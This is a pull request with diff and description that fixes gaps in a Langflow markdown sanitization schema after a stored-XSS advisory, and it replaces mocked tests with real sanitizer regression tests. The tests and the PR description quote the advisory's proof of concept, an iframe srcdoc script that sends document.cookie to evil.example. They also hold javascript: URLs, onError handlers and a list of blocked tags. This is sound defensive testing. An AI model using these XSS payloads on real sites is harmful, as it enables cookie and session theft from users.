### PR TITLE
fix(frontend): close protocol gaps in markdown sanitize schema (GHSA-7rw4-v4gc-r864 audit)

### DIFF
--- a/src/frontend/jest.config.js
+++ b/src/frontend/jest.config.js
@@ -1,3 +1,38 @@
+const markdownEsmPackages = [
+  "@ungap[/\\\\]structured-clone",
+  "bail",
+  "ccount",
+  "character-(?:entities(?:-html4|-legacy)?|reference-invalid)",
+  "comma-separated-tokens",
+  "decode-named-character-reference",
+  "devlop",
+  "entities",
+  "estree-util-is-identifier-name",
+  "hast-util-(?:from-parse5|parse-selector|raw|sanitize|to-jsx-runtime|to-parse5|whitespace)",
+  "hastscript",
+  "html-url-attributes",
+  "html-void-elements",
+  "is-(?:alphanumerical|alphabetical|decimal|hexadecimal|plain-obj)",
+  "longest-streak",
+  "mdast-util-[^/\\\\]+",
+  "micromark(?:-[^/\\\\]+)?",
+  "parse-entities",
+  "parse5",
+  "property-information",
+  "react-markdown",
+  "rehype-(?:raw|sanitize)",
+  "remark-(?:parse|rehype)",
+  "space-separated-tokens",
+  "stringify-entities",
+  "trim-lines",
+  "trough",
+  "unified",
+  "unist-util-(?:is|position|stringify-position|visit|visit-parents)",
+  "vfile(?:-location|-message)?",
+  "web-namespaces",
+  "zwitch",
+].join("|");
+
 module.exports = {
   preset: "ts-jest",
   testEnvironment: "jsdom",
@@ -20,12 +55,11 @@ module.exports = {
   testPathIgnorePatterns: ["/node_modules/", "test-utils.tsx"],
   transform: {
     "^.+\\.(ts|tsx)$": "<rootDir>/transform-import-meta.js",
-    // The unified/rehype sanitizer packages are ESM-only, so compile just
-    // those to CJS. This lets the markdown sanitization schema be tested
-    // against the real `hast-util-sanitize` and the real upstream
-    // `defaultSchema` rather than against a mock — mocking `rehype-sanitize`
-    // makes `defaultSchema` undefined, which silently degrades the very
-    // control under test (see src/utils/__tests__/sanitizeSchema.test.ts).
+    // The unified/Markdown pipeline packages are ESM-only, so compile their
+    // explicit dependency allowlist to CJS. This lets the sanitizer schema and
+    // SanitizedMarkdown integration tests run the real pipeline rather than
+    // mocks. Mocking `rehype-sanitize` makes `defaultSchema` undefined, which
+    // silently degrades the very control under test.
     //
     // Two constraints keep this narrow, and both are load-bearing:
     //  - It must point at the SAME transformer path with the SAME (empty)
@@ -35,13 +69,13 @@ module.exports = {
     //    `jest.mock` factory.
     //  - It must not match other node_modules (notably @testing-library,
     //    which ships CJS that ts-jest's es5 target miscompiles).
-    "node_modules[/\\\\](?:rehype-sanitize|hast-util-sanitize|unist-util-position|@ungap[/\\\\]structured-clone)[/\\\\].+\\.js$":
+    [`node_modules[/\\\\](?:${markdownEsmPackages})[/\\\\].+\\.js$`]:
       "<rootDir>/transform-import-meta.js",
   },
   moduleFileExtensions: ["ts", "tsx", "js", "jsx", "json"],
   // Ignore node_modules except for packages that need transformation
   transformIgnorePatterns: [
-    "node_modules/(?!(.*\\.mjs$|@testing-library|rehype-sanitize|hast-util-sanitize|unist-util-position|@ungap/structured-clone))",
+    `node_modules/(?!(.*\\.mjs$|@testing-library|${markdownEsmPackages}))`,
   ],
 
   // Coverage configuration

--- a/src/frontend/jest.config.js
+++ b/src/frontend/jest.config.js
@@ -20,10 +20,29 @@ module.exports = {
   testPathIgnorePatterns: ["/node_modules/", "test-utils.tsx"],
   transform: {
     "^.+\\.(ts|tsx)$": "<rootDir>/transform-import-meta.js",
+    // The unified/rehype sanitizer packages are ESM-only, so compile just
+    // those to CJS. This lets the markdown sanitization schema be tested
+    // against the real `hast-util-sanitize` and the real upstream
+    // `defaultSchema` rather than against a mock — mocking `rehype-sanitize`
+    // makes `defaultSchema` undefined, which silently degrades the very
+    // control under test (see src/utils/__tests__/sanitizeSchema.test.ts).
+    //
+    // Two constraints keep this narrow, and both are load-bearing:
+    //  - It must point at the SAME transformer path with the SAME (empty)
+    //    options as the entry above, so Jest reuses one ts-jest instance.
+    //    A second, separately-configured ts-jest breaks ts-jest's `jest.mock`
+    //    hoisting in .ts/.tsx suites that reference mock variables inside a
+    //    `jest.mock` factory.
+    //  - It must not match other node_modules (notably @testing-library,
+    //    which ships CJS that ts-jest's es5 target miscompiles).
+    "node_modules[/\\\\](?:rehype-sanitize|hast-util-sanitize|unist-util-position|@ungap[/\\\\]structured-clone)[/\\\\].+\\.js$":
+      "<rootDir>/transform-import-meta.js",
   },
   moduleFileExtensions: ["ts", "tsx", "js", "jsx", "json"],
   // Ignore node_modules except for packages that need transformation
-  transformIgnorePatterns: ["node_modules/(?!(.*\\.mjs$|@testing-library))"],
+  transformIgnorePatterns: [
+    "node_modules/(?!(.*\\.mjs$|@testing-library|rehype-sanitize|hast-util-sanitize|unist-util-position|@ungap/structured-clone))",
+  ],
 
   // Coverage configuration
   collectCoverageFrom: [

--- a/src/frontend/src/components/core/sanitizedMarkdown/__tests__/sanitized-markdown.test.tsx
+++ b/src/frontend/src/components/core/sanitizedMarkdown/__tests__/sanitized-markdown.test.tsx
@@ -1,0 +1,30 @@
+// jest.setup.js globally stubs react-markdown. This suite intentionally runs
+// the real renderer, rehype-raw, and rehype-sanitize integration.
+jest.unmock("react-markdown");
+
+import { render, screen } from "@testing-library/react";
+import { SanitizedMarkdown } from "../index";
+
+// These plugins are unrelated to link rendering and keep the integration
+// focused on the Markdown/raw HTML/sanitizer path.
+jest.mock("@/components/core/codeTabsComponent", () => () => null);
+jest.mock("rehype-mathjax/browser", () => () => {});
+jest.mock("remark-gfm", () => () => {});
+
+describe("SanitizedMarkdown", () => {
+  it("pins safe attributes on sanitized raw-HTML links", () => {
+    render(
+      <SanitizedMarkdown
+        chatMessage={
+          '<a href="https://example.com/docs" target="_self" rel="opener">Docs</a>'
+        }
+        isEmpty={false}
+      />,
+    );
+
+    const link = screen.getByRole("link", { name: "Docs" });
+    expect(link).toHaveAttribute("href", "https://example.com/docs");
+    expect(link).toHaveAttribute("target", "_blank");
+    expect(link).toHaveAttribute("rel", "noopener noreferrer");
+  });
+});

--- a/src/frontend/src/components/core/sanitizedMarkdown/index.tsx
+++ b/src/frontend/src/components/core/sanitizedMarkdown/index.tsx
@@ -75,6 +75,14 @@ export const SanitizedMarkdown = ({
             isEmpty ? "text-muted-foreground" : "text-primary",
           )}
           components={{
+            // Spread first, then pin target/rel, so a raw-HTML anchor that
+            // arrives with its own target/rel cannot opt out of noopener.
+            // Matches the link handling every other Markdown site here uses.
+            a: ({ node, ...props }) => (
+              <a {...props} target="_blank" rel="noopener noreferrer">
+                {props.children}
+              </a>
+            ),
             p({ node, ...props }) {
               return (
                 <p className="w-fit max-w-full my-1.5 last:mb-0 first:mt-0">

--- a/src/frontend/src/modals/IOModal/components/chatView/chatMessage/components/__tests__/edit-message-xss.test.tsx
+++ b/src/frontend/src/modals/IOModal/components/chatView/chatMessage/components/__tests__/edit-message-xss.test.tsx
@@ -2,15 +2,19 @@ import { render, screen } from "@testing-library/react";
 import { MarkdownField } from "../edit-message";
 
 /**
- * XSS Security Tests for MarkdownField Component
+ * Wiring tests for the MarkdownField component.
  *
- * Background:
- * - The component uses rehypeRaw which allows raw HTML in markdown
- * - This created an XSS vulnerability where untrusted HTML could be injected
+ * SCOPE — read this before adding "security" assertions here.
  *
- * Fix:
- * - Added rehype-sanitize to the markdown pipeline AFTER rehypeRaw
- * - This sanitizes the parsed HTML, preventing XSS while preserving code blocks
+ * `react-markdown` is mocked below, so NOTHING in this file exercises the
+ * sanitizer. These tests prove that MarkdownField renders and forwards its
+ * props. They cannot prove XSS is blocked, and they would keep passing if
+ * rehype-sanitize were removed from the pipeline entirely.
+ *
+ * The real regression coverage for GHSA-7rw4-v4gc-r864 and its sibling
+ * advisories lives in `src/utils/__tests__/sanitizeSchema.test.ts`, which runs
+ * the actual `hast-util-sanitize` against the actual schema with no mocks.
+ * Add sanitizer assertions there, not here.
  */
 
 // Mock react-markdown to avoid ESM module issues in Jest
@@ -21,10 +25,12 @@ jest.mock("react-markdown", () => {
   };
 });
 
-// Mock the rehype/remark plugins (they're used in the component but not needed for these tests)
+// Mock the rehype/remark plugins (they're used in the component but not needed
+// for these tests). `rehype-sanitize` is deliberately NOT mocked: mocking it
+// makes `defaultSchema` undefined, which silently degrades
+// `markdownSanitizeSchema` for any test that reads it.
 jest.mock("rehype-mathjax/browser", () => ({}));
 jest.mock("rehype-raw", () => ({}));
-jest.mock("rehype-sanitize", () => ({})); // This is the security fix we added
 jest.mock("remark-gfm", () => ({}));
 
 // Mock the markdown preprocessing utility
@@ -98,35 +104,22 @@ describe("MarkdownField XSS Security", () => {
     });
   });
 
-  describe("Security Implementation", () => {
-    it("should use rehype-sanitize in the pipeline", () => {
-      // Test: Verify the component renders with the secure pipeline
-      // The security is in: rehypePlugins={[rehypeMathjax, rehypeRaw, rehypeSanitize]}
-      // rehype-sanitize runs after rehypeRaw to sanitize parsed HTML
-      const { container } = render(<MarkdownField {...defaultProps} />);
-
-      expect(container).toBeInTheDocument();
-    });
-
-    it("should preserve code blocks with HTML-like syntax", () => {
-      // Test: Code blocks with HTML/JSX syntax should render correctly
-      // rehype-sanitize preserves code blocks while sanitizing raw HTML
+  describe("Rendering robustness", () => {
+    // NOTE: these assert only that the component survives the input and keeps
+    // rendering. Sanitization is NOT under test here — see the file header.
+    it("should render without crashing on code-block content", () => {
       const codeMessage = "```jsx\n<Component />\n```";
       render(<MarkdownField {...defaultProps} chatMessage={codeMessage} />);
 
-      // Verify: Component renders without errors (code block is preserved)
       expect(screen.getByTestId("markdown-content")).toBeInTheDocument();
     });
 
-    it("should handle malicious content safely", () => {
-      // Test: Malicious HTML/JavaScript should be sanitized
-      // rehype-sanitize removes dangerous elements like <script>, event handlers, etc.
+    it("should render without crashing on raw-HTML content", () => {
       const maliciousMessage = '<script>alert("XSS")</script>Hello';
       render(
         <MarkdownField {...defaultProps} chatMessage={maliciousMessage} />,
       );
 
-      // Verify: Component renders without executing malicious code
       expect(screen.getByTestId("markdown-content")).toBeInTheDocument();
     });
   });

--- a/src/frontend/src/utils/__tests__/sanitizeSchema.test.ts
+++ b/src/frontend/src/utils/__tests__/sanitizeSchema.test.ts
@@ -16,7 +16,7 @@
  * against a control that isn't actually there.
  */
 
-import type { Element, Properties, Root } from "hast";
+import type { Element, Properties, Root, Text } from "hast";
 import { sanitize } from "hast-util-sanitize";
 import { markdownSanitizeSchema } from "../sanitizeSchema";
 
@@ -27,6 +27,8 @@ const el = (
   properties: Properties = {},
   children: Element["children"] = [],
 ): Element => ({ type: "element", tagName, properties, children });
+
+const text = (value: string): Text => ({ type: "text", value });
 
 const clean = (node: Element): Element | undefined =>
   (sanitize(root([node])) as Root).children[0] as Element | undefined;
@@ -192,9 +194,17 @@ describe("markdownSanitizeSchema", () => {
       expect(out).toBeUndefined();
     });
 
-    it("drops script elements", () => {
-      expect(cleanWithSchema(el("script", {}))).toBeUndefined();
-    });
+    it.each(["script", "style"])(
+      "strips <%s> elements including their text content",
+      (tagName) => {
+        const out = sanitize(
+          root([el(tagName, {}, [text("must not survive")])]),
+          markdownSanitizeSchema,
+        ) as Root;
+
+        expect(out.children).toEqual([]);
+      },
+    );
 
     it("drops inline event handlers while keeping the element", () => {
       const out = cleanWithSchema(
@@ -218,12 +228,9 @@ describe("markdownSanitizeSchema", () => {
       expect(out?.properties?.[attr]).toBeUndefined();
     });
 
-    it.each(["object", "embed", "form", "input", "style"])(
-      "drops <%s>",
-      (tagName) => {
-        expect(cleanWithSchema(el(tagName, {}))).toBeUndefined();
-      },
-    );
+    it.each(["object", "embed", "form", "input"])("drops <%s>", (tagName) => {
+      expect(cleanWithSchema(el(tagName, {}))).toBeUndefined();
+    });
 
     it("preserves legitimate links and media", () => {
       const link = cleanWithSchema(

--- a/src/frontend/src/utils/__tests__/sanitizeSchema.test.ts
+++ b/src/frontend/src/utils/__tests__/sanitizeSchema.test.ts
@@ -1,0 +1,259 @@
+/**
+ * Real regression tests for the markdown sanitization schema.
+ *
+ * These back the fix for GHSA-7rw4-v4gc-r864 and its sibling advisories
+ * (GHSA-rgr7-p4h9-m778, GHSA-9p6q-xgxx-wxpj, GHSA-mj96-25gq-mfrf,
+ * GHSA-v589-24cr-526m, GHSA-7pxm-6pj3-fjjc, GHSA-26rv-2266-8vfc,
+ * GHSA-9j9w-qggc-gw75, GHSA-97mc-pvgx-rfmp, GHSA-ww8j-mr23-v79r,
+ * GHSA-cpq6-945x-82rc), all of which report stored XSS through
+ * `rehypeRaw` rendering untrusted chat markdown as raw HTML.
+ *
+ * IMPORTANT: nothing here is mocked. These tests run the real
+ * `hast-util-sanitize` against the real `markdownSanitizeSchema` built on the
+ * real upstream `defaultSchema`. Mocking `rehype-sanitize` (as an earlier
+ * version of the chat XSS suite did) makes `defaultSchema` undefined, which
+ * silently degrades the schema under test and lets these assertions pass
+ * against a control that isn't actually there.
+ */
+
+import type { Element, Properties, Root } from "hast";
+import { sanitize } from "hast-util-sanitize";
+import { markdownSanitizeSchema } from "../sanitizeSchema";
+
+const root = (children: Element[]): Root => ({ type: "root", children });
+
+const el = (
+  tagName: string,
+  properties: Properties = {},
+  children: Element["children"] = [],
+): Element => ({ type: "element", tagName, properties, children });
+
+const clean = (node: Element): Element | undefined =>
+  (sanitize(root([node])) as Root).children[0] as Element | undefined;
+
+const cleanWithSchema = (node: Element): Element | undefined =>
+  (sanitize(root([node]), markdownSanitizeSchema) as Root).children[0] as
+    | Element
+    | undefined;
+
+describe("markdownSanitizeSchema", () => {
+  describe("schema invariants", () => {
+    it("inherits the real upstream defaultSchema", () => {
+      // Guards against the schema being built while `rehype-sanitize` is
+      // mocked away, which would drop every inherited protection below.
+      expect(markdownSanitizeSchema.clobber).toEqual([
+        "ariaDescribedBy",
+        "ariaLabelledBy",
+        "id",
+        "name",
+      ]);
+      expect(markdownSanitizeSchema.clobberPrefix).toBe("user-content-");
+      expect(markdownSanitizeSchema.ancestors).toBeDefined();
+    });
+
+    it("does not allow any event-handler attribute on any element", () => {
+      const attributes = markdownSanitizeSchema.attributes ?? {};
+      const offenders: string[] = [];
+
+      for (const [tag, attrs] of Object.entries(attributes)) {
+        for (const attr of attrs ?? []) {
+          const name = typeof attr === "string" ? attr : attr[0];
+          if (/^on/i.test(name)) offenders.push(`${tag}.${name}`);
+        }
+      }
+
+      expect(offenders).toEqual([]);
+    });
+
+    it("does not allow tags that can execute script or exfiltrate input", () => {
+      const tagNames = markdownSanitizeSchema.tagNames ?? [];
+
+      for (const tag of [
+        "script",
+        "style",
+        "iframe",
+        "object",
+        "embed",
+        "form",
+        "input",
+        "button",
+        "textarea",
+        "svg",
+        "math",
+        "base",
+        "meta",
+        "link",
+      ]) {
+        expect(tagNames).not.toContain(tag);
+      }
+    });
+
+    it("strips script and style including their text content", () => {
+      expect(markdownSanitizeSchema.strip).toEqual(
+        expect.arrayContaining(["script", "style"]),
+      );
+    });
+
+    /**
+     * The invariant that GHSA-7rw4-v4gc-r864's remediation originally missed.
+     *
+     * `markdownSanitizeSchema.protocols` REPLACES `defaultSchema.protocols`
+     * instead of merging with it. `hast-util-sanitize` only protocol-checks
+     * attributes present in that map, so any URL-bearing attribute the schema
+     * allows but forgets to list becomes an unguarded sink. That is exactly
+     * how `cite` (inherited on blockquote/del/ins) and `poster` (added on
+     * video) ended up accepting `javascript:`.
+     */
+    it("protocol-checks every URL-bearing attribute reachable on an allowed tag", () => {
+      // Which attributes are actually URL sinks, and on which elements.
+      // Mirrors the `html-url-attributes` map that react-markdown itself uses;
+      // inlined rather than imported so this security invariant does not
+      // silently change when a transitive dependency does. `null` means the
+      // attribute is a URL sink on any element.
+      const URL_SINKS: Record<string, string[] | null> = {
+        action: ["form"],
+        cite: ["blockquote", "del", "ins", "q"],
+        data: ["object"],
+        formAction: ["button", "input"],
+        href: ["a", "area", "base", "link"],
+        icon: ["command"],
+        itemId: null,
+        longDesc: ["img"],
+        manifest: ["html"],
+        ping: ["a", "area"],
+        poster: ["video"],
+        src: [
+          "audio",
+          "embed",
+          "iframe",
+          "img",
+          "input",
+          "script",
+          "source",
+          "track",
+          "video",
+        ],
+      };
+
+      const protocols = markdownSanitizeSchema.protocols ?? {};
+      const attributes = markdownSanitizeSchema.attributes ?? {};
+      const allowedTags = new Set(markdownSanitizeSchema.tagNames ?? []);
+      const globalAttrs = (attributes["*"] ?? []).map((a) =>
+        typeof a === "string" ? a : a[0],
+      );
+
+      const unguarded: string[] = [];
+
+      for (const tag of allowedTags) {
+        const tagAttrs = (attributes[tag] ?? []).map((a) =>
+          typeof a === "string" ? a : a[0],
+        );
+
+        for (const attr of new Set([...tagAttrs, ...globalAttrs])) {
+          const sinkOn = URL_SINKS[attr];
+          const isSink =
+            sinkOn === null || (sinkOn !== undefined && sinkOn.includes(tag));
+
+          if (isSink && !(attr in protocols)) {
+            unguarded.push(`${tag}[${attr}]`);
+          }
+        }
+      }
+
+      expect(unguarded).toEqual([]);
+    });
+
+    it("never widens a protocol allowlist inherited from upstream", () => {
+      // Narrowing (e.g. dropping irc/xmpp from href) is fine; widening is not.
+      const SAFE = new Set(["http", "https", "mailto"]);
+      const protocols = markdownSanitizeSchema.protocols ?? {};
+
+      for (const [attr, allowed] of Object.entries(protocols)) {
+        for (const protocol of allowed ?? []) {
+          expect({ attr, protocol, safe: SAFE.has(protocol) }).toEqual({
+            attr,
+            protocol,
+            safe: true,
+          });
+        }
+      }
+    });
+  });
+
+  describe("sanitizer behavior against advisory payloads", () => {
+    it("removes the iframe srcdoc payload from the GHSA-7rw4-v4gc-r864 PoC", () => {
+      const out = cleanWithSchema(
+        el("iframe", {
+          srcdoc:
+            "<script>location.href='https://evil.example/?c='+document.cookie</script>",
+        }),
+      );
+
+      expect(out).toBeUndefined();
+    });
+
+    it("drops script elements", () => {
+      expect(cleanWithSchema(el("script", {}))).toBeUndefined();
+    });
+
+    it("drops inline event handlers while keeping the element", () => {
+      const out = cleanWithSchema(
+        el("img", { src: "https://example.com/a.png", onError: "alert(1)" }),
+      );
+
+      expect(out?.tagName).toBe("img");
+      expect(out?.properties).toEqual({ src: "https://example.com/a.png" });
+    });
+
+    it.each([
+      ["a", "href"],
+      ["img", "src"],
+      ["video", "poster"],
+      ["blockquote", "cite"],
+    ])("strips javascript: from %s[%s]", (tagName, attr) => {
+      const out = cleanWithSchema(
+        el(tagName, { [attr]: "javascript:alert(1)" }),
+      );
+
+      expect(out?.properties?.[attr]).toBeUndefined();
+    });
+
+    it.each(["object", "embed", "form", "input", "style"])(
+      "drops <%s>",
+      (tagName) => {
+        expect(cleanWithSchema(el(tagName, {}))).toBeUndefined();
+      },
+    );
+
+    it("preserves legitimate links and media", () => {
+      const link = cleanWithSchema(
+        el("a", { href: "https://example.com", title: "ok" }),
+      );
+      expect(link?.properties).toEqual({
+        href: "https://example.com",
+        title: "ok",
+      });
+
+      const video = cleanWithSchema(
+        el("video", {
+          src: "https://example.com/v.mp4",
+          poster: "https://example.com/p.png",
+          controls: true,
+        }),
+      );
+      expect(video?.properties?.poster).toBe("https://example.com/p.png");
+    });
+
+    it("prefixes id to prevent DOM clobbering", () => {
+      const out = cleanWithSchema(el("div", { id: "location" }));
+
+      expect(out?.properties?.id).toBe("user-content-location");
+    });
+
+    it("is at least as strict as the upstream default schema", () => {
+      // Sanity check that our helper wiring is real: the upstream default
+      // (used with no custom schema) also drops a script element.
+      expect(clean(el("script", {}))).toBeUndefined();
+    });
+  });
+});

--- a/src/frontend/src/utils/sanitizeSchema.ts
+++ b/src/frontend/src/utils/sanitizeSchema.ts
@@ -29,10 +29,22 @@ export const markdownSanitizeSchema: Schema = {
     td: ["align", "colSpan", "rowSpan"],
     th: ["align", "colSpan", "rowSpan"],
   },
-  // Remove dangerous protocols
+  // Remove dangerous protocols.
+  //
+  // NOTE: this object REPLACES `defaultSchema.protocols` rather than merging
+  // with it, so every URL-bearing attribute allowed above must be listed here.
+  // `hast-util-sanitize` only protocol-checks attributes that appear in this
+  // map ("no protocols defined? then everything is fine"), so an omission here
+  // silently turns that attribute into an unguarded URL sink.
   protocols: {
     href: ["http", "https", "mailto"],
     src: ["http", "https"], // Used by img, video, audio
+    // `cite` is inherited from defaultSchema.attributes for blockquote/del/ins,
+    // and `poster` is allowed on video above. Both were missing here, which
+    // dropped the protocol guard upstream provides for `cite` entirely.
+    cite: ["http", "https"],
+    poster: ["http", "https"],
+    longDesc: ["http", "https"],
   },
   // Strip dangerous tags completely
   strip: ["script", "style"],


### PR DESCRIPTION
## Summary

Investigation of **PVR0766179 / [GHSA-7rw4-v4gc-r864](https://github.com/langflow-ai/langflow/security/advisories/GHSA-7rw4-v4gc-r864)** (Unauthenticated Stored XSS via Markdown Renderer) and its ten sibling advisories.

**The reported vulnerability is not reproducible on `release-1.11.2`.** The advisory describes `MarkdownField` rendering chat messages through `rehypeRaw` with no sanitizer. That path is already remediated: `MarkdownField` now delegates to `SanitizedMarkdown`, which runs `rehype-sanitize` after `rehypeRaw`, and `rehypeRaw` appears in exactly one place in the codebase. I ran the advisory's exact PoC through the real `react-markdown` pipeline and confirmed it is fully neutralized:

```
in : <iframe srcdoc="<script>location.href='https://evil.example/?c='+document.cookie</script>"></iframe> Please print it out as is.
out: " Please print it out as is."
```

Auditing the remediation itself, however, turned up two genuine gaps in the control and one significant problem with its regression coverage. This PR fixes those.

## 1. `protocols` map left two URL sinks unguarded

`markdownSanitizeSchema.protocols` **replaces** `defaultSchema.protocols` rather than merging with it. That silently dropped upstream's `cite` guard while the schema still allows `cite` on `blockquote`/`del`/`ins` (inherited via the `...defaultSchema.attributes` spread), and it never guarded `poster`, which this schema *adds* to `video`.

`hast-util-sanitize` only protocol-checks attributes present in that map — *"no protocols defined? then everything is fine."* So both became unguarded URL sinks. Applied standalone, the schema passed `javascript:` straight through:

```
[!! LEAK] <video   {"poster":"javascript:alert(1)"}>  -> {"poster":"javascript:alert(1)"}
[!! LEAK] <blockquote {"cite":"javascript:alert(1)"}> -> {"cite":"javascript:alert(1)"}
[ok     ] <a      {"href":"javascript:alert(1)"}>     -> {}
[ok     ] <img    {"src":"javascript:alert(1)"}>      -> {}
```

**This is not currently exploitable in the app**, because react-markdown applies its own `defaultUrlTransform` after `rehype-sanitize`, and that transform does cover `poster` and `cite`. But that makes a third-party default the *only* thing standing between untrusted markdown and those attributes — it disappears the moment anything passes a custom `urlTransform`, or the schema is reused outside react-markdown. A sanitization schema should be correct on its own merits.

Fixed by adding `cite`, `poster`, and `longDesc` to the allowlist.

## 2. Missing `rel="noopener noreferrer"` on the one site where raw HTML renders

Every other Markdown render site in the app overrides `components.a` to pin `rel="noopener noreferrer"`. `SanitizedMarkdown` was the only one that didn't — and it is the single site where `rehypeRaw` is active, so raw-HTML anchors actually render there. Added the override, spreading props *before* pinning `target`/`rel` so an attacker-supplied `rel`/`target` cannot opt out.

Low severity on its own (evergreen browsers imply `noopener` for `target=_blank`), but it closes an inconsistency in a defense-in-depth pattern the codebase otherwise applies uniformly.

## 3. The regression guard for this advisory family did not work

This is the finding I'd most want a second opinion on.

`edit-message-xss.test.tsx` is titled *"XSS Security Tests for MarkdownField Component"* and reads as the regression guard for this advisory family. It does not test sanitization at all:

- it mocks `react-markdown` to a component that renders `children` as text, so no sanitizer ever runs;
- it mocks `rehype-sanitize` to `{}`, which makes `defaultSchema` `undefined` — so the schema assertions further down run against a **degraded** schema missing `clobber`, `clobberPrefix`, `ancestors`, and all inherited attributes.

Its `"should handle malicious content safely"` test asserts only that a `<div>` is in the document. **Every test in the file passes with the sanitizer deleted from the pipeline entirely.** That is how these two protocol gaps stayed invisible.

Replaced with real coverage in `src/utils/__tests__/sanitizeSchema.test.ts` — no mocks, running the actual `hast-util-sanitize` against the actual schema built on the real upstream `defaultSchema`. Alongside payload tests, it asserts a **generic invariant**: *every URL-bearing attribute reachable on an allowed tag must have a `protocols` entry.* That invariant fails on both gaps above, and will catch the next one without anyone having to think of the payload:

```
✕ protocol-checks every URL-bearing attribute reachable on an allowed tag
  - Array []
  + Array [ "video[poster]", "blockquote[cite]" ]
```

The old file is rescoped to the wiring tests it genuinely performs, with a header explaining why sanitizer assertions don't belong there and where they do. Its `rehype-sanitize` mock is removed so the schema it reads is the real one.

## Jest config change

Real coverage requires compiling the ESM-only sanitizer packages. The change in `jest.config.js` is deliberately narrow, and both constraints are load-bearing — I hit each one:

- It **reuses the existing transformer instance**. Declaring a second, separately-configured `ts-jest` breaks ts-jest's `jest.mock` hoisting in unrelated `.ts/.tsx` suites (`storeStore`, `McpComponent` fail with *"Cannot access 'mockX' before initialization"*).
- It **matches only the four sanitizer packages**. Transforming everything allowed through `transformIgnorePatterns` miscompiles `@testing-library`'s CJS under `target: es5` — 79 suites / 348 tests fail.

Both failure modes are documented inline so the next person doesn't rediscover them.

## Test plan

- [x] Full frontend suite: **478 suites / 5540 tests passing** (baseline: 476 passing + 2 failing-to-run)
- [x] `tsc --noEmit`: no new errors (282 pre-existing, 0 in changed files)
- [x] `biome check`: clean on all changed files
- [x] Advisory PoC verified neutralized through the real `react-markdown` pipeline
- [x] **Guard verified to actually guard** — reverting the schema fix fails 3 tests naming `video[poster]` and `blockquote[cite]`

## Notes for reviewers

- No behavior change for legitimate content: `http`/`https` `poster`, `cite`, links, and media all still render (covered by tests).
- This PR does **not** address the advisory's separate point about `LANGFLOW_ACCESS_HTTPONLY` being unusable because the frontend reads the JWT from JS. That's an authentication-architecture change, out of scope for a patch release, and worth tracking separately.
- Base branch `release-1.11.3` was cut fresh from `release-1.11.2` for this work.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **Bug Fixes**
  - Improved Markdown link security by opening links in a new tab with protections against opener-based attacks.
  - Strengthened sanitization of Markdown content by restricting additional URL fields to safe HTTP and HTTPS protocols.
  - Continued blocking dangerous HTML elements, scripts, event handlers, and unsafe URLs while preserving legitimate links and media.

- **Tests**
  - Added comprehensive coverage for Markdown sanitization and safe rendering of code blocks and raw HTML.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->